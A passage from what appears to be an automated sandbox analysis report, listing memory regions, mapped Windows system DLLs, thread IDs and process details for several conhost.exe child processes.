"private_0x0000006fba0d0000" filename = "" Region: id = 3166 start_va = 0x6fba0e0000 end_va = 0x6fba0e0fff entry_point = 0x0 region_type = private name = "private_0x0000006fba0e0000" filename = "" Region: id = 3167 start_va = 0x6fba0f0000 end_va = 0x6fba0f0fff entry_point = 0x0 region_type = private name = "private_0x0000006fba0f0000" filename = "" Region: id = 3168 start_va = 0x6fba3a0000 end_va = 0x6fba3affff entry_point = 0x0 region_type = private name = "private_0x0000006fba3a0000" filename = "" Region: id = 3169 start_va = 0x6fba3b0000 end_va = 0x6fba537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006fba3b0000" filename = "" Region: id = 3170 start_va = 0x6fba540000 end_va = 0x6fba6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006fba540000" filename = "" Region: id = 3171 start_va = 0x6fba6d0000 end_va = 0x6fbbacffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006fba6d0000" filename = "" Region: id = 3172 start_va = 0x7ff6c4450000 end_va = 0x7ff6c454ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4450000" filename = "" Region: id = 3173 start_va = 0x7ff6c457b000 end_va = 0x7ff6c457cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c457b000" filename = "" Region: id = 3174 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3175 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3176 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3177 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3178 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3179 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3180 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3181 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3182 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3183 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3184 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3185 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4330 start_va = 0x6fba100000 end_va = 0x6fba13ffff entry_point = 0x0 region_type = private name = "private_0x0000006fba100000" filename = "" Region: id = 4331 start_va = 0x6fba2e0000 end_va = 0x6fba2effff entry_point = 0x0 region_type = private name = "private_0x0000006fba2e0000" filename = "" Region: id = 4332 start_va = 0x6fba380000 end_va = 0x6fba38ffff entry_point = 0x0 region_type = private name = "private_0x0000006fba380000" filename = "" Region: id = 4333 start_va = 0x6fbbad0000 end_va = 0x6fbbe06fff entry_point = 0x6fbbad0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4334 start_va = 0x6fbbe10000 end_va = 0x6fbc020fff entry_point = 0x0 region_type = private name = "private_0x0000006fbbe10000" filename = "" Region: id = 4335 start_va = 0x6fbc030000 end_va = 0x6fbc241fff entry_point = 0x0 region_type = private name = "private_0x0000006fbc030000" filename = "" Region: id = 4336 start_va = 0x6fbc250000 end_va = 0x6fbc35afff entry_point = 0x0 region_type = private name = "private_0x0000006fbc250000" filename = "" Region: id = 4337 start_va = 0x6fbc360000 end_va = 0x6fbc57ffff entry_point = 0x0 region_type = private name = "private_0x0000006fbc360000" filename = "" Region: id = 4338 start_va = 0x6fbc580000 end_va = 0x6fbc68afff entry_point = 0x0 region_type = private name = "private_0x0000006fbc580000" filename = "" Region: id = 4339 start_va = 0x7ff6c4579000 end_va = 0x7ff6c457afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4579000" filename = "" Region: id = 4340 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4341 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4342 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4343 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4344 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4345 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4346 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4347 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4348 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 116 os_tid = 0xe8c Thread: id = 160 os_tid = 0xfcc Thread: id = 230 os_tid = 0x109c Thread: id = 290 os_tid = 0x11b8 Process: id = "86" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf513000" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0xd2c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1909 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1910 start_va = 0xc1a05b0000 end_va = 0xc1a05cffff entry_point = 0x0 region_type = private name = "private_0x000000c1a05b0000" filename = "" Region: id = 1911 start_va = 0xc1a05d0000 end_va = 0xc1a05e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c1a05d0000" filename = "" Region: id = 1912 start_va = 0xc1a05f0000 end_va = 0xc1a062ffff entry_point = 0x0 region_type = private name = "private_0x000000c1a05f0000" filename = "" Region: id = 1913 start_va = 0x7df5ff930000 end_va = 0x7ff5ff92ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff930000" filename = "" Region: id = 1914 start_va = 0x7ff6c4210000 end_va = 0x7ff6c4232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4210000" filename = "" Region: id = 1915 start_va = 0x7ff6c423a000 end_va = 0x7ff6c423afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c423a000" filename = "" Region: id = 1916 start_va = 0x7ff6c423e000 end_va = 0x7ff6c423ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c423e000" filename = "" Region: id = 1917 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1918 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1919 start_va = 0xc1a06f0000 end_va = 0xc1a07effff entry_point = 0x0 region_type = private name = "private_0x000000c1a06f0000" filename = "" Region: id = 1920 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1921 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3134 start_va = 0xc1a05b0000 end_va = 0xc1a05bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c1a05b0000" filename = "" Region: id = 3135 start_va = 0xc1a05c0000 end_va = 0xc1a05c6fff entry_point = 0x0 region_type = private name = "private_0x000000c1a05c0000" filename = "" Region: id = 3136 start_va = 0xc1a0630000 end_va = 0xc1a06edfff entry_point = 0xc1a0630000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3137 start_va = 0xc1a07f0000 end_va = 0xc1a082ffff entry_point = 0x0 region_type = private name = "private_0x000000c1a07f0000" filename = "" Region: id = 3138 start_va = 0xc1a0830000 end_va = 0xc1a0830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c1a0830000" filename = "" Region: id = 3139 start_va = 0xc1a0840000 end_va = 0xc1a0846fff entry_point = 0x0 region_type = private name = "private_0x000000c1a0840000" filename = "" Region: id = 3140 start_va = 0xc1a0850000 end_va = 0xc1a0850fff entry_point = 0x0 region_type = private name = "private_0x000000c1a0850000" filename = "" Region: id = 3141 start_va = 0xc1a0860000 end_va = 0xc1a0860fff entry_point = 0x0 region_type = private name = "private_0x000000c1a0860000" filename = "" Region: id = 3142 start_va = 0xc1a08b0000 end_va = 0xc1a08bffff entry_point = 0x0 region_type = private name = "private_0x000000c1a08b0000" filename = "" Region: id = 3143 start_va = 0xc1a08c0000 end_va = 0xc1a0a47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c1a08c0000" filename = "" Region: id = 3144 start_va = 0xc1a0a50000 end_va = 0xc1a0bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c1a0a50000" filename = "" Region: id = 3145 start_va = 0xc1a0be0000 end_va = 0xc1a1fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c1a0be0000" filename = "" Region: id = 3146 start_va = 0x7ff6c4110000 end_va = 0x7ff6c420ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4110000" filename = "" Region: id = 3147 start_va = 0x7ff6c423c000 end_va = 0x7ff6c423dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c423c000" filename = "" Region: id = 3148 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3149 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3150 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3151 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3152 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3153 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3154 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3155 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3156 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3157 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3158 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3159 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4355 start_va = 0xc1a0870000 end_va = 0xc1a08affff entry_point = 0x0 region_type = private name = "private_0x000000c1a0870000" filename = "" Region: id = 4356 start_va = 0xc1a20c0000 end_va = 0xc1a20cffff entry_point = 0x0 region_type = private name = "private_0x000000c1a20c0000" filename = "" Region: id = 4357 start_va = 0xc1a21c0000 end_va = 0xc1a21cffff entry_point = 0x0 region_type = private name = "private_0x000000c1a21c0000" filename = "" Region: id = 4358 start_va = 0xc1a21d0000 end_va = 0xc1a2506fff entry_point = 0xc1a21d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4359 start_va = 0xc1a2510000 end_va = 0xc1a272dfff entry_point = 0x0 region_type = private name = "private_0x000000c1a2510000" filename = "" Region: id = 4360 start_va = 0xc1a2730000 end_va = 0xc1a2941fff entry_point = 0x0 region_type = private name = "private_0x000000c1a2730000" filename = "" Region: id = 4361 start_va = 0xc1a2950000 end_va = 0xc1a2a5bfff entry_point = 0x0 region_type = private name = "private_0x000000c1a2950000" filename = "" Region: id = 4362 start_va = 0xc1a2a60000 end_va = 0xc1a2c79fff entry_point = 0x0 region_type = private name = "private_0x000000c1a2a60000" filename = "" Region: id = 4363 start_va = 0xc1a2c80000 end_va = 0xc1a2d89fff entry_point = 0x0 region_type = private name = "private_0x000000c1a2c80000" filename = "" Region: id = 4364 start_va = 0x7ff6c4238000 end_va = 0x7ff6c4239fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4238000" filename = "" Region: id = 4365 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4366 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4367 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4368 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4369 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4370 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4371 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4372 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4373 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 117 os_tid = 0xe94 Thread: id = 159 os_tid = 0xfc8 Thread: id = 229 os_tid = 0x1098 Thread: id = 291 os_tid = 0x11bc Process: id = "87" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf62f000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xd34" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1922 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1923 start_va = 0xa837d70000 end_va = 0xa837d8ffff entry_point = 0x0 region_type = private name = "private_0x000000a837d70000" filename = "" Region: id = 1924 start_va = 0xa837d90000 end_va = 0xa837da3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a837d90000" filename = "" Region: id = 1925 start_va = 0xa837db0000 end_va = 0xa837deffff entry_point = 0x0 region_type = private name = "private_0x000000a837db0000" filename = "" Region: id = 1926 start_va = 0x7df5ff740000 end_va = 0x7ff5ff73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff740000" filename = "" Region: id = 1927 start_va = 0x7ff6c3f40000 end_va = 0x7ff6c3f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f40000" filename = "" Region: id = 1928 start_va = 0x7ff6c3f67000 end_va = 0x7ff6c3f67fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f67000" filename = "" Region: id = 1929 start_va = 0x7ff6c3f6e000 end_va = 0x7ff6c3f6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f6e000" filename = "" Region: id = 1930 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1931 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2583 start_va = 0xa837e30000 end_va = 0xa837f2ffff entry_point = 0x0 region_type = private name = "private_0x000000a837e30000" filename = "" Region: id = 2584 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2585 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2614 start_va = 0xa837d70000 end_va = 0xa837d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a837d70000" filename = "" Region: id = 2615 start_va = 0xa837d80000 end_va = 0xa837d86fff entry_point = 0x0 region_type = private name = "private_0x000000a837d80000" filename = "" Region: id = 2616 start_va = 0xa837df0000 end_va = 0xa837e2ffff entry_point = 0x0 region_type = private name = "private_0x000000a837df0000" filename = "" Region: id = 2617 start_va = 0xa837f30000 end_va = 0xa837fedfff entry_point = 0xa837f30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2618 start_va = 0xa837ff0000 end_va = 0xa837ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a837ff0000" filename = "" Region: id = 2619 start_va = 0xa838000000 end_va = 0xa838006fff entry_point = 0x0 region_type = private name = "private_0x000000a838000000" filename = "" Region: id = 2620 start_va = 0xa838010000 end_va = 0xa838010fff entry_point = 0x0 region_type = private name = "private_0x000000a838010000" filename = "" Region: id = 2621 start_va = 0xa838020000 end_va = 0xa838020fff entry_point = 0x0 region_type = private name = "private_0x000000a838020000" filename = "" Region: id = 2622 start_va = 0xa838150000 end_va = 0xa83815ffff entry_point = 0x0 region_type = private name = "private_0x000000a838150000" filename = "" Region: id = 2623 start_va = 0xa838160000 end_va = 0xa8382e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a838160000" filename = "" Region: id = 2624 start_va = 0xa8382f0000 end_va = 0xa838470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a8382f0000" filename = "" Region: id = 2625 start_va = 0xa838480000 end_va = 0xa83987ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a838480000" filename = "" Region: id = 2626 start_va = 0x7ff6c3e40000 end_va = 0x7ff6c3f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e40000" filename = "" Region: id = 2627 start_va = 0x7ff6c3f6c000 end_va = 0x7ff6c3f6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f6c000" filename = "" Region: id = 2628 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2629 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2630 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2631 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2632 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2633 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2634 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2635 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2636 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2637 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2638 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2639 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4803 start_va = 0xa838030000 end_va = 0xa83806ffff entry_point = 0x0 